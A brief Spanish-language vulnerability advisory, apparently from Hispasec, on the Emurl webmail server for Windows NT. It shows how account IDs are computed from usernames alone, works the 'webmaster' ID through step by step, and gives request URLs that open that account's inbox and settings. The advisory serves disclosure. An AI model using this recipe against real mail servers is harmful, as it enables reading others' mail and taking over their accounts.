Emurl es un servidor de correo electrónico con interfaz Web
para Windows NT. Una vulnerabilidad permite a cualquiera
leer los mensajes, capturar contraseñas y configurar
cualquier cuenta con tan sólo conocer el nombre de usuario.
Para acceder a cualquier recurso de una cuenta toda la
seguridad, inexistente, de este sistema se basa en un
número de identificación (ID) para cada usuario. El
algoritmo es pésimo, para calcularlo sólo se basa en el
nombre de usuario, en vez de hacerlo en la contraseña,
por ejemplo.
Para hallar el ID de una cuenta basta con calcular el
código ASCII de cada uno de los caracteres que forman el
nombre y sumarles la posición. Por ejemplo, en el caso
de que el nombre de usuario es «webmaster»:
w = 119 + 1 = 120
e = 101 + 2 = 103
b = 98 + 3 = 101
m = 109 + 4 = 113
a = 97 + 5 = 102
s = 115 + 6 = 121
t = 116 + 7 = 123
e = 101 + 8 = 109
r = 114 + 9 = 123
ID=120103101113102121123109123
Para acceder al buzón de entrada y ver los mensajes:
http://www.algunwebmail.com/scripts/emurl/recman.dll?
TYPE=RECIEVEMAIL&USER=120103101113102121123109123
Para acceder a la configuración de la cuenta:
http://www.algunwebmail.com/scripts/emurl/MAKEHTML_M.dll?
TYPE=USER&USER=USER=120103101113102121123109123
Más información:
Emurl
bernardo@hispasec.com
